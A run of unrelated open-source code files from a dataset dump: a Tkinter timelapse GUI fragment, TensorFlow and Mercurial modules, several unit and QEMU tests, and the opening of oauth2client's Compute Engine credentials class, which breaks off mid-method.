lengthError = True
profile = self.variables['cam_profile'].get()
if (len(name) < 2):
self.notifier.addNotice('Name too short','error')
return
if (waitError):
self.notifier.addNotice('Invalid wait value','error')
return
if (lengthError):
self.notifier.addNotice('Invalid length value','error')
return
if (not self.profile.blobExists() and name in Timelapse.TimelapseProfile.GetAllNames()):
self.notifier.addNotice('A timelapse with that name already exists','error')
return
elif (self.profile.blobExists() and name != self.profile.jsonData['name'] and name in Timelapse.TimelapseProfile.GetAllNames()):
self.notifier.addNotice('A timelapse with that name already exists','error')
return
if (wait < 1):
self.notifier.addNotice('Wait time must be at least 1','error')
return
if (self.profile.jsonData['cap_mode'] == 'video'):
if (length < 1):
self.notifier.addNotice('Footage time must be at least 1','error')
return
elif(length > wait -1):
self.notifier.addNotice('Footage time must be less than wait time','error')
return
self.profile.jsonData['video_length'] = length #commit length
camProfile = [x for x in Camera.CameraProfile.GetAll().values() if x.jsonData['profile_name'] == profile]
if (not any(camProfile)):
self.notifier.addNotice('Invalid profile name: {}'.format(profile),'error')
return
else:
self.profile.jsonData['cam_profile'] = camProfile[0].jbIndex
self.profile.jsonData['name'] = name
self.profile.jsonData['{}_wait'.format(self.profile.jsonData['cap_mode'])] = wait
self.profile.save()
Timelapse.TimelapseProfile.ClearCache()
self.OnManageClick()
self.notifier.addNotice('Timelapse profile saved')
def OnDeleteProfileClick(self):
""" action - deletes a profile
"""
if (hasattr(self, 'profile') and self.profile.blobExists()):
self.profile.delete()
Timelapse.TimelapseProfile.ClearCache()
self.OnManageClick()
def OnStillModeClick(self):
""" action - switch to still mode
"""
if (hasattr(self, 'profile')):
self.profile.jsonData['cap_mode'] = 'still'
self.updateCapMode()
def OnVideoModeClick(self):
""" action - switch to video mode
"""
if (hasattr(self, 'profile')):
self.profile.jsonData['cap_mode'] = 'video'
self.updateCapMode()
def OnToggleActive(self, index = None):
""" action - handle active checkbox
@param index
"""
if (self.profile.jsonData['active']):
self.profile.jsonData['active'] = False
else:
self.profile.jsonData['active'] = True
def OnActivateClick(self, index):
""" action - handle activate button
@param index
"""
profile = Timelapse.TimelapseProfile(index)
if (profile.blobExists()):
if (profile.jsonData['active']):
profile.jsonData['active'] = False
else:
profile.jsonData['active'] = True
profile.save()
self.widgets['actButton{}'.format(index)].configure(image=self.images['stop'] if profile.jsonData['active'] else self.images['play'])
Timelapse.TimelapseProfile.ClearCache()
def OnMediaClick(self, index):
""" action - display media items page
@param index
"""
self.profile = Timelapse.TimelapseProfile(index)
if (self.profile.blobExists()):
self.listMedia()
def OnDeleteMediaClick(self):
""" action - display delete media page
"""
self.deleteMedia()
def OnDeleteMediaConfirmClick(self):
""" action - delete media items
"""
res = {
'success': 0,
'missing': 0,
'meta': False
}
if (self.variables['media'].get()):
for x in self.profile.jsonData['media']:
path = os.path.join(x['path'], x['filename'])
if (os.path.exists(path)):
os.remove(path)
res['success'] += 1
else:
res['missing'] += 1
if (self.variables['meta'].get()):
self.profile.jsonData['media'] = []
self.profile.save()
res['meta'] = True
self.notifier.addNotice('{} files deleted, {} missing. Meta data {}'.format(res['success'],res['missing'],'cleared' if res['meta'] else 'preserved'))
self.OnMediaClick(self.profile.jbIndex)
def OnToggleDeleteMedia(self):
""" action - allows media to be preserved but meta data gets wiped
"""
if (self.variables['media'].get() and not self.variables['meta'].get()):
self.variables['meta'].set(True)
def updateCapMode(self):
""" util - updates the capture mode state
"""
capMode = self.profile.jsonData['cap_mode']
if (capMode == 'still'):
self.widgets['recstillbutton'].configure(state='disabled')
self.widgets['recvidbutton'].configure(state='normal')
self.stillWaitOptions(self.widgets['waitframe'])
else:
self.widgets['recstillbutton'].configure(state='normal')
self.widgets['recvidbutton'].configure(state='disabled')
self.videoWaitOptions(self.widgets['waitframe'])
self.widgets['recmodeLabel'].configure(text='Video' if capMode == 'video' else 'Photo') | gpl-2.0 |
SnakeJenny/TensorFlow | tensorflow/python/client/client_lib.py | 111 | 1698 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Support for launching graphs and executing operations.
See the @{$python/client} guide.
@@Session
@@InteractiveSession
@@get_default_session
@@OpError
@@CancelledError
@@UnknownError
@@InvalidArgumentError
@@DeadlineExceededError
@@NotFoundError
@@AlreadyExistsError
@@PermissionDeniedError
@@UnauthenticatedError
@@ResourceExhaustedError
@@FailedPreconditionError
@@AbortedError
@@OutOfRangeError
@@UnimplementedError
@@InternalError
@@UnavailableError
@@DataLossError
@@exception_type_from_error_code
@@error_code_from_exception_type
@@raise_exception_on_not_ok_status
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.client.session import InteractiveSession
from tensorflow.python.client.session import Session
from tensorflow.python.framework import errors
from tensorflow.python.framework.errors import OpError
from tensorflow.python.framework.ops import get_default_session
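# A minimal usage sketch of the re-exported session API (illustrative only):
#
#   import tensorflow as tf
#   with tf.Session() as sess:
#       print(sess.run(tf.constant(3) + tf.constant(4)))  # prints 7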
| apache-2.0 |
javiercantero/streamlink | tests/test_plugin_srgssr.py | 6 | 1345 | import unittest
from streamlink.plugins.srgssr import SRGSSR
class TestPluginSRGSSR(unittest.TestCase):
def test_can_handle_url(self):
# should match
self.assertTrue(SRGSSR.can_handle_url("http://srf.ch/play/tv/live"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rsi.ch/play/tv/live#?tvLiveId=livestream_La1"))
self.assertTrue(SRGSSR.can_handle_url("http://rsi.ch/play/tv/live?tvLiveId=livestream_La1"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rtr.ch/play/tv/live"))
self.assertTrue(SRGSSR.can_handle_url("http://rtr.ch/play/tv/live"))
self.assertTrue(SRGSSR.can_handle_url("http://rts.ch/play/tv/direct#?tvLiveId=3608506"))
self.assertTrue(SRGSSR.can_handle_url("http://www.srf.ch/play/tv/live#?tvLiveId=c49c1d64-9f60-0001-1c36-43c288c01a10"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rts.ch/sport/direct/8328501-tennis-open-daustralie.html"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rts.ch/play/tv/tennis/video/tennis-open-daustralie?id=8328501"))
# shouldn't match
self.assertFalse(SRGSSR.can_handle_url("http://www.crunchyroll.com/gintama"))
self.assertFalse(SRGSSR.can_handle_url("http://www.crunchyroll.es/gintama"))
self.assertFalse(SRGSSR.can_handle_url("http://www.youtube.com/"))
| bsd-2-clause |
quattor/aquilon | tests/broker/test_update_dns_environment.py | 2 | 2249 | #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2014,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the add dns environment command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestUpdateDnsEnvironment(TestBrokerCommand):
def test_100_update_comments(self):
self.noouttest(["update_dns_environment", "--dns_environment", "ut-env",
"--comments", "New DNS env comments"])
def test_105_verify_update(self):
command = ["show", "dns", "environment", "--dns_environment", "ut-env"]
out = self.commandtest(command)
self.matchoutput(out, "DNS Environment: ut-env", command)
self.matchoutput(out, "Comments: New DNS env comments", command)
def test_110_clear_comments(self):
self.noouttest(["update_dns_environment", "--dns_environment", "ut-env",
"--comments", ""])
def test_115_verify_comments(self):
command = ["show", "dns", "environment", "--dns_environment", "ut-env"]
out = self.commandtest(command)
self.matchclean(out, "Comments", command)
def test_200_update_nonexistent(self):
command = ["update", "dns", "environment",
"--dns_environment", "no-such-env"]
out = self.notfoundtest(command)
self.matchoutput(out, "DNS Environment no-such-env not found.", command)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestUpdateDnsEnvironment)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 |
inares/edx-platform | common/test/acceptance/performance/test_lms_performance.py | 103 | 4363 | """
Single page performance tests for LMS.
"""
from bok_choy.web_app_test import with_cache
from ..pages.lms.auto_auth import AutoAuthPage
from ..pages.lms.courseware import CoursewarePage
from ..pages.lms.dashboard import DashboardPage
from ..pages.lms.course_info import CourseInfoPage
from ..pages.lms.login import LoginPage
from ..pages.lms.progress import ProgressPage
from ..pages.common.logout import LogoutPage
from ..fixtures.course import CourseFixture, XBlockFixtureDesc, CourseUpdateDesc
from ..tests.helpers import UniqueCourseTest, load_data_str
from nose.plugins.attrib import attr
@attr(har_mode='explicit')
class LmsPerformanceTest(UniqueCourseTest):
"""
Base class to capture LMS performance with HTTP Archives.
"""
username = 'test_student'
email = '[email protected]'
def setUp(self):
"""
Setup course
"""
super(LmsPerformanceTest, self).setUp()
# Install a course with sections/problems, tabs, updates, and handouts
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
course_fix.add_update(CourseUpdateDesc(date='January 29, 2014', content='Test course update1'))
course_fix.add_update(CourseUpdateDesc(date='January 30, 2014', content='Test course update2'))
course_fix.add_update(CourseUpdateDesc(date='January 31, 2014', content='Test course update3'))
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section 1').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 1').add_children(
XBlockFixtureDesc('problem', 'Test Problem 1', data=load_data_str('multiple_choice.xml')),
XBlockFixtureDesc('problem', 'Test Problem 2', data=load_data_str('formula_problem.xml')),
XBlockFixtureDesc('html', 'Test HTML', data="<html>Html child text</html>"),
)
),
XBlockFixtureDesc('chapter', 'Test Section 2').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 2').add_children(
XBlockFixtureDesc('html', 'Html Child', data="<html>Html child text</html>")
)
),
XBlockFixtureDesc('chapter', 'Test Section 3').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 3').add_children(
XBlockFixtureDesc('problem', 'Test Problem 3')
)
)
).install()
AutoAuthPage(self.browser, username=self.username, email=self.email, course_id=self.course_id).visit()
def _make_har_file(self, page):
"""
Visit page and make HAR file.
"""
har_name = '{page}_{course}'.format(page=type(page).__name__, course=self.course_info['number'])
self.har_capturer.add_page(self.browser, har_name)
page.visit()
self.har_capturer.save_har(self.browser, har_name)
@with_cache
    def test_visit_courseware(self):
"""
        Produce a HAR for loading the Courseware page.
"""
courseware_page = CoursewarePage(self.browser, self.course_id)
self._make_har_file(courseware_page)
@with_cache
def test_visit_dashboard(self):
"""
Produce a HAR for loading the Dashboard page.
"""
dashboard_page = DashboardPage(self.browser)
self._make_har_file(dashboard_page)
@with_cache
def test_visit_course_info(self):
"""
Produce a HAR for loading the Course Info page.
"""
course_info_page = CourseInfoPage(self.browser, self.course_id)
self._make_har_file(course_info_page)
@with_cache
def test_visit_login_page(self):
"""
Produce a HAR for loading the Login page.
"""
login_page = LoginPage(self.browser)
# Logout previously logged in user to be able to see Login page.
LogoutPage(self.browser).visit()
self._make_har_file(login_page)
@with_cache
def test_visit_progress_page(self):
"""
Produce a HAR for loading the Progress page.
"""
progress_page = ProgressPage(self.browser, self.course_id)
self._make_har_file(progress_page)
| agpl-3.0 |
mindbender-studio/setup | bin/windows/python36/Lib/ctypes/test/test_varsize_struct.py | 277 | 1842 | from ctypes import *
import unittest
class VarSizeTest(unittest.TestCase):
def test_resize(self):
class X(Structure):
_fields_ = [("item", c_int),
("array", c_int * 1)]
self.assertEqual(sizeof(X), sizeof(c_int) * 2)
x = X()
x.item = 42
x.array[0] = 100
self.assertEqual(sizeof(x), sizeof(c_int) * 2)
# make room for one additional item
new_size = sizeof(X) + sizeof(c_int) * 1
resize(x, new_size)
self.assertEqual(sizeof(x), new_size)
self.assertEqual((x.item, x.array[0]), (42, 100))
# make room for 10 additional items
new_size = sizeof(X) + sizeof(c_int) * 9
resize(x, new_size)
self.assertEqual(sizeof(x), new_size)
self.assertEqual((x.item, x.array[0]), (42, 100))
# make room for one additional item
new_size = sizeof(X) + sizeof(c_int) * 1
resize(x, new_size)
self.assertEqual(sizeof(x), new_size)
self.assertEqual((x.item, x.array[0]), (42, 100))
def test_array_invalid_length(self):
        # cannot create arrays with negative size
self.assertRaises(ValueError, lambda: c_int * -1)
self.assertRaises(ValueError, lambda: c_int * -3)
def test_zerosized_array(self):
array = (c_int * 0)()
        # accessing elements of zero-sized arrays raises IndexError
self.assertRaises(IndexError, array.__setitem__, 0, None)
self.assertRaises(IndexError, array.__getitem__, 0)
self.assertRaises(IndexError, array.__setitem__, 1, None)
self.assertRaises(IndexError, array.__getitem__, 1)
self.assertRaises(IndexError, array.__setitem__, -1, None)
self.assertRaises(IndexError, array.__getitem__, -1)
if __name__ == "__main__":
unittest.main()
| mit |
CongSmile/tp-qemu | qemu/tests/virtio_port_hotplug.py | 6 | 3479 | import time
import logging
from autotest.client.shared import error
from avocado.core import exceptions
from virttest.qemu_devices import qdevices
@error.context_aware
def run(test, params, env):
"""
Test hot unplug virtio serial devices.
1) Start guest with virtio serial device(s).
2) Load module in guest os.
3) For each of the virtio serial ports, do following steps one by one:
3.1) Unload module in guest
3.2) Hot-unplug the virtio serial port
3.3) Hotplug the devices
3.4) Reload module in the guest
    4) Repeat steps 2-3 100 times
5) Reboot VM to make sure the guest kernel not panic.
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def get_virtio_port_by_name(vm, name):
"""
Get virtio port object by name in VM.
:param name: name of the port
"""
for device in vm.devices:
if isinstance(device, qdevices.QDevice):
if device.get_param("name") == name:
return device
return None
def get_virtio_port_name_by_params(params, tag):
"""
Get virtio port name via params according tag.
:param params: test params.
:param tag: port name or tag(eg, vc1).
"""
prefix = params.get('virtio_port_name_prefix')
index = params.objects("virtio_ports").index(tag)
if prefix:
return "%s%d" % (prefix, index)
return tag
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
timeout = int(params.get("login_timeout", 360))
for repeat in xrange(int(params.get("repeat_times", 1))):
repeat += 1
session = vm.wait_for_login(timeout=timeout)
module = params.get("modprobe_module")
if module:
error.context("Load module %s" % module, logging.info)
session.cmd("modprobe %s" % module)
for port in params.objects("virtio_ports"):
port_params = params.object_params(port)
port_name = get_virtio_port_name_by_params(port_params, port)
virtio_port = get_virtio_port_by_name(vm, port_name)
if not virtio_port:
raise exceptions.TestFail(
"Virtio Port named '%s' not found" %
port_name)
chardev_qid = virtio_port.get_param("chardev")
port_chardev = vm.devices.get_by_qid(chardev_qid)[0]
if module:
error.context("Unload module %s" % module, logging.info)
session.cmd("modprobe -r %s" % module)
error.context("Unplug virtio port '%s' in %d tune(s)" %
(port, repeat), logging.info)
virtio_port.unplug(vm.monitor)
if port_params.get("unplug_chardev") == "yes":
error.context(
"Unplug chardev '%s' for virtio port '%s'" %
(port, chardev_qid), logging.info)
port_chardev.unplug(vm.monitor)
time.sleep(0.5)
port_chardev.hotplug(vm.monitor)
virtio_port.hotplug(vm.monitor)
if module:
error.context("Load module %s" % module, logging.info)
session.cmd("modprobe %s" % module)
session.close()
vm.reboot()
session = vm.wait_for_login(timeout=timeout)
session.close()
| gpl-2.0 |
akosyakov/intellij-community | plugins/hg4idea/testData/bin/mercurial/templater.py | 90 | 16673 | # templater.py - template expansion for output
#
# Copyright 2005, 2006 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from i18n import _
import sys, os, re
import util, config, templatefilters, parser, error
import types
import minirst
# template parsing
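# Roughly, each entry below maps a token type to a tuple of
# (binding strength, prefix rule, infix rule) consumed by the
# operator-precedence parser in parser.py.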
elements = {
"(": (20, ("group", 1, ")"), ("func", 1, ")")),
",": (2, None, ("list", 2)),
"|": (5, None, ("|", 5)),
"%": (6, None, ("%", 6)),
")": (0, None, None),
"symbol": (0, ("symbol",), None),
"string": (0, ("string",), None),
"end": (0, None, None),
}
def tokenizer(data):
program, start, end = data
pos = start
while pos < end:
c = program[pos]
if c.isspace(): # skip inter-token whitespace
pass
elif c in "(,)%|": # handle simple operators
yield (c, None, pos)
elif (c in '"\'' or c == 'r' and
program[pos:pos + 2] in ("r'", 'r"')): # handle quoted strings
if c == 'r':
pos += 1
c = program[pos]
decode = False
else:
decode = True
pos += 1
s = pos
while pos < end: # find closing quote
d = program[pos]
if decode and d == '\\': # skip over escaped characters
pos += 2
continue
if d == c:
if not decode:
yield ('string', program[s:pos].replace('\\', r'\\'), s)
break
yield ('string', program[s:pos].decode('string-escape'), s)
break
pos += 1
else:
raise error.ParseError(_("unterminated string"), s)
elif c.isalnum() or c in '_':
s = pos
pos += 1
while pos < end: # find end of symbol
d = program[pos]
if not (d.isalnum() or d == "_"):
break
pos += 1
sym = program[s:pos]
yield ('symbol', sym, s)
pos -= 1
elif c == '}':
pos += 1
break
else:
raise error.ParseError(_("syntax error"), pos)
pos += 1
yield ('end', None, pos)
def compiletemplate(tmpl, context):
parsed = []
pos, stop = 0, len(tmpl)
p = parser.parser(tokenizer, elements)
while pos < stop:
n = tmpl.find('{', pos)
if n < 0:
parsed.append(("string", tmpl[pos:]))
break
if n > 0 and tmpl[n - 1] == '\\':
# escaped
parsed.append(("string", tmpl[pos:n - 1] + "{"))
pos = n + 1
continue
if n > pos:
parsed.append(("string", tmpl[pos:n]))
pd = [tmpl, n + 1, stop]
parseres, pos = p.parse(pd)
parsed.append(parseres)
return [compileexp(e, context) for e in parsed]
def compileexp(exp, context):
t = exp[0]
if t in methods:
return methods[t](exp, context)
raise error.ParseError(_("unknown method '%s'") % t)
# template evaluation
def getsymbol(exp):
if exp[0] == 'symbol':
return exp[1]
raise error.ParseError(_("expected a symbol"))
def getlist(x):
if not x:
return []
if x[0] == 'list':
return getlist(x[1]) + [x[2]]
return [x]
def getfilter(exp, context):
f = getsymbol(exp)
if f not in context._filters:
raise error.ParseError(_("unknown function '%s'") % f)
return context._filters[f]
def gettemplate(exp, context):
if exp[0] == 'string':
return compiletemplate(exp[1], context)
if exp[0] == 'symbol':
return context._load(exp[1])
raise error.ParseError(_("expected template specifier"))
def runstring(context, mapping, data):
return data
def runsymbol(context, mapping, key):
v = mapping.get(key)
if v is None:
v = context._defaults.get(key, '')
if util.safehasattr(v, '__call__'):
return v(**mapping)
if isinstance(v, types.GeneratorType):
v = list(v)
mapping[key] = v
return v
return v
def buildfilter(exp, context):
func, data = compileexp(exp[1], context)
filt = getfilter(exp[2], context)
return (runfilter, (func, data, filt))
def runfilter(context, mapping, data):
func, data, filt = data
try:
return filt(func(context, mapping, data))
except (ValueError, AttributeError, TypeError):
if isinstance(data, tuple):
dt = data[1]
else:
dt = data
raise util.Abort(_("template filter '%s' is not compatible with "
"keyword '%s'") % (filt.func_name, dt))
def buildmap(exp, context):
func, data = compileexp(exp[1], context)
ctmpl = gettemplate(exp[2], context)
return (runmap, (func, data, ctmpl))
def runtemplate(context, mapping, template):
for func, data in template:
yield func(context, mapping, data)
def runmap(context, mapping, data):
func, data, ctmpl = data
d = func(context, mapping, data)
if util.safehasattr(d, '__call__'):
d = d()
lm = mapping.copy()
for i in d:
if isinstance(i, dict):
lm.update(i)
lm['originalnode'] = mapping.get('node')
yield runtemplate(context, lm, ctmpl)
else:
            # v is not an iterable of dicts, this happens when 'key'
# has been fully expanded already and format is useless.
# If so, return the expanded value.
yield i
def buildfunc(exp, context):
n = getsymbol(exp[1])
args = [compileexp(x, context) for x in getlist(exp[2])]
if n in funcs:
f = funcs[n]
return (f, args)
if n in templatefilters.funcs:
f = templatefilters.funcs[n]
return (f, args)
if n in context._filters:
if len(args) != 1:
raise error.ParseError(_("filter %s expects one argument") % n)
f = context._filters[n]
return (runfilter, (args[0][0], args[0][1], f))
def get(context, mapping, args):
if len(args) != 2:
# i18n: "get" is a keyword
raise error.ParseError(_("get() expects two arguments"))
dictarg = args[0][0](context, mapping, args[0][1])
if not util.safehasattr(dictarg, 'get'):
# i18n: "get" is a keyword
raise error.ParseError(_("get() expects a dict as first argument"))
key = args[1][0](context, mapping, args[1][1])
yield dictarg.get(key)
def join(context, mapping, args):
if not (1 <= len(args) <= 2):
# i18n: "join" is a keyword
raise error.ParseError(_("join expects one or two arguments"))
joinset = args[0][0](context, mapping, args[0][1])
if util.safehasattr(joinset, '__call__'):
jf = joinset.joinfmt
joinset = [jf(x) for x in joinset()]
joiner = " "
if len(args) > 1:
joiner = args[1][0](context, mapping, args[1][1])
first = True
for x in joinset:
if first:
first = False
else:
yield joiner
yield x
def sub(context, mapping, args):
if len(args) != 3:
# i18n: "sub" is a keyword
raise error.ParseError(_("sub expects three arguments"))
pat = stringify(args[0][0](context, mapping, args[0][1]))
rpl = stringify(args[1][0](context, mapping, args[1][1]))
src = stringify(args[2][0](context, mapping, args[2][1]))
src = stringify(runtemplate(context, mapping,
compiletemplate(src, context)))
yield re.sub(pat, rpl, src)
def if_(context, mapping, args):
if not (2 <= len(args) <= 3):
# i18n: "if" is a keyword
raise error.ParseError(_("if expects two or three arguments"))
test = stringify(args[0][0](context, mapping, args[0][1]))
if test:
t = stringify(args[1][0](context, mapping, args[1][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
elif len(args) == 3:
t = stringify(args[2][0](context, mapping, args[2][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
def ifeq(context, mapping, args):
if not (3 <= len(args) <= 4):
# i18n: "ifeq" is a keyword
raise error.ParseError(_("ifeq expects three or four arguments"))
test = stringify(args[0][0](context, mapping, args[0][1]))
match = stringify(args[1][0](context, mapping, args[1][1]))
if test == match:
t = stringify(args[2][0](context, mapping, args[2][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
elif len(args) == 4:
t = stringify(args[3][0](context, mapping, args[3][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
def label(context, mapping, args):
if len(args) != 2:
# i18n: "label" is a keyword
raise error.ParseError(_("label expects two arguments"))
    # ignore args[0] (the label string) since this is supposed to be a no-op
t = stringify(args[1][0](context, mapping, args[1][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
def rstdoc(context, mapping, args):
if len(args) != 2:
# i18n: "rstdoc" is a keyword
raise error.ParseError(_("rstdoc expects two arguments"))
text = stringify(args[0][0](context, mapping, args[0][1]))
style = stringify(args[1][0](context, mapping, args[1][1]))
return minirst.format(text, style=style, keep=['verbose'])
methods = {
"string": lambda e, c: (runstring, e[1]),
"symbol": lambda e, c: (runsymbol, e[1]),
"group": lambda e, c: compileexp(e[1], c),
# ".": buildmember,
"|": buildfilter,
"%": buildmap,
"func": buildfunc,
}
funcs = {
"get": get,
"if": if_,
"ifeq": ifeq,
"join": join,
"label": label,
"rstdoc": rstdoc,
"sub": sub,
}
# template engine
path = ['templates', '../templates']
stringify = templatefilters.stringify
def _flatten(thing):
'''yield a single stream from a possibly nested set of iterators'''
if isinstance(thing, str):
yield thing
elif not util.safehasattr(thing, '__iter__'):
if thing is not None:
yield str(thing)
else:
for i in thing:
if isinstance(i, str):
yield i
elif not util.safehasattr(i, '__iter__'):
if i is not None:
yield str(i)
elif i is not None:
for j in _flatten(i):
yield j
def parsestring(s, quoted=True):
'''parse a string using simple c-like syntax.
string must be in quotes if quoted is True.'''
if quoted:
if len(s) < 2 or s[0] != s[-1]:
raise SyntaxError(_('unmatched quotes'))
return s[1:-1].decode('string_escape')
return s.decode('string_escape')
class engine(object):
'''template expansion engine.
template expansion works like this. a map file contains key=value
pairs. if value is quoted, it is treated as string. otherwise, it
is treated as name of template file.
templater is asked to expand a key in map. it looks up key, and
looks for strings like this: {foo}. it expands {foo} by looking up
foo in map, and substituting it. expansion is recursive: it stops
when there is no more {foo} to replace.
expansion also allows formatting and filtering.
format uses key to expand each item in list. syntax is
{key%format}.
filter uses function to transform value. syntax is
{key|filter1|filter2|...}.'''
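    # Illustrative sketch of the syntax described above; the keyword and
    # filter names here are examples only and are not defined by this module:
    #
    #   changeset = 'rev {rev}: {author|person}\n'
    #
    # Expanding "changeset" would substitute {rev} from the mapping and run
    # the author value through a "person" filter before substitution.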
def __init__(self, loader, filters={}, defaults={}):
self._loader = loader
self._filters = filters
self._defaults = defaults
self._cache = {}
def _load(self, t):
'''load, parse, and cache a template'''
if t not in self._cache:
self._cache[t] = compiletemplate(self._loader(t), self)
return self._cache[t]
def process(self, t, mapping):
'''Perform expansion. t is name of map element to expand.
mapping contains added elements for use during expansion. Is a
generator.'''
return _flatten(runtemplate(self, mapping, self._load(t)))
engines = {'default': engine}
class templater(object):
def __init__(self, mapfile, filters={}, defaults={}, cache={},
minchunk=1024, maxchunk=65536):
'''set up template engine.
mapfile is name of file to read map definitions from.
filters is dict of functions. each transforms a value into another.
defaults is dict of default map definitions.'''
self.mapfile = mapfile or 'template'
self.cache = cache.copy()
self.map = {}
self.base = (mapfile and os.path.dirname(mapfile)) or ''
self.filters = templatefilters.filters.copy()
self.filters.update(filters)
self.defaults = defaults
self.minchunk, self.maxchunk = minchunk, maxchunk
self.ecache = {}
if not mapfile:
return
if not os.path.exists(mapfile):
raise util.Abort(_('style not found: %s') % mapfile)
conf = config.config()
conf.read(mapfile)
for key, val in conf[''].items():
if not val:
raise SyntaxError(_('%s: missing value') % conf.source('', key))
if val[0] in "'\"":
try:
self.cache[key] = parsestring(val)
except SyntaxError, inst:
raise SyntaxError('%s: %s' %
(conf.source('', key), inst.args[0]))
else:
val = 'default', val
if ':' in val[1]:
val = val[1].split(':', 1)
self.map[key] = val[0], os.path.join(self.base, val[1])
def __contains__(self, key):
return key in self.cache or key in self.map
def load(self, t):
'''Get the template for the given template name. Use a local cache.'''
if t not in self.cache:
try:
self.cache[t] = util.readfile(self.map[t][1])
except KeyError, inst:
raise util.Abort(_('"%s" not in template map') % inst.args[0])
except IOError, inst:
raise IOError(inst.args[0], _('template file %s: %s') %
(self.map[t][1], inst.args[1]))
return self.cache[t]
def __call__(self, t, **mapping):
ttype = t in self.map and self.map[t][0] or 'default'
if ttype not in self.ecache:
self.ecache[ttype] = engines[ttype](self.load,
self.filters, self.defaults)
proc = self.ecache[ttype]
stream = proc.process(t, mapping)
if self.minchunk:
stream = util.increasingchunks(stream, min=self.minchunk,
max=self.maxchunk)
return stream
def templatepath(name=None):
'''return location of template file or directory (if no name).
returns None if not found.'''
normpaths = []
# executable version (py2exe) doesn't support __file__
if util.mainfrozen():
module = sys.executable
else:
module = __file__
for f in path:
if f.startswith('/'):
p = f
else:
fl = f.split('/')
p = os.path.join(os.path.dirname(module), *fl)
if name:
p = os.path.join(p, name)
if name and os.path.exists(p):
return os.path.normpath(p)
elif os.path.isdir(p):
normpaths.append(os.path.normpath(p))
return normpaths
def stylemap(styles, paths=None):
"""Return path to mapfile for a given style.
Searches mapfile in the following locations:
1. templatepath/style/map
2. templatepath/map-style
3. templatepath/map
"""
if paths is None:
paths = templatepath()
elif isinstance(paths, str):
paths = [paths]
if isinstance(styles, str):
styles = [styles]
for style in styles:
if not style:
continue
locations = [os.path.join(style, 'map'), 'map-' + style]
locations.append('map')
for path in paths:
for location in locations:
mapfile = os.path.join(path, location)
if os.path.isfile(mapfile):
return style, mapfile
raise RuntimeError("No hgweb templates found in %r" % paths)
| apache-2.0 |
chwnam/lifemotif-desktop | python/oauth2client/gce.py | 224 | 3038 | # Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Google Compute Engine
Utilities for making it easier to use OAuth 2.0 on Google Compute Engine.
"""
__author__ = '[email protected] (Joe Gregorio)'
import httplib2
import logging
import uritemplate
from oauth2client import util
from oauth2client.anyjson import simplejson
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import AssertionCredentials
logger = logging.getLogger(__name__)
# URI Template for the endpoint that returns access_tokens.
META = ('http://metadata.google.internal/0.1/meta-data/service-accounts/'
'default/acquire{?scope}')
class AppAssertionCredentials(AssertionCredentials):
"""Credentials object for Compute Engine Assertion Grants
This object will allow a Compute Engine instance to identify itself to
Google and other OAuth 2.0 servers that can verify assertions. It can be used
for the purpose of accessing data stored under an account assigned to the
Compute Engine instance itself.
This credential does not require a flow to instantiate because it represents
a two legged flow, and therefore has all of the required information to
generate and refresh its own access tokens.
"""
@util.positional(2)
def __init__(self, scope, **kwargs):
"""Constructor for AppAssertionCredentials
Args:
scope: string or iterable of strings, scope(s) of the credentials being
requested.
"""
self.scope = util.scopes_to_string(scope)
# Assertion type is no longer used, but still in the parent class signature.
super(AppAssertionCredentials, self).__init__(None)
@classmethod
def from_json(cls, json):
data = simplejson.loads(json)
return AppAssertionCredentials(data['scope'])
def _refresh(self, http_request):
"""Refreshes the access_token.
Skip all the storage hoops and just refresh using the API.
Args:
http_request: callable, a callable that matches the method signature of
httplib2.Http.request, used to make the refresh request.
Raises:
AccessTokenRefreshError: When the refresh fails.
"""
uri = uritemplate.expand(META, {'scope': self.scope})
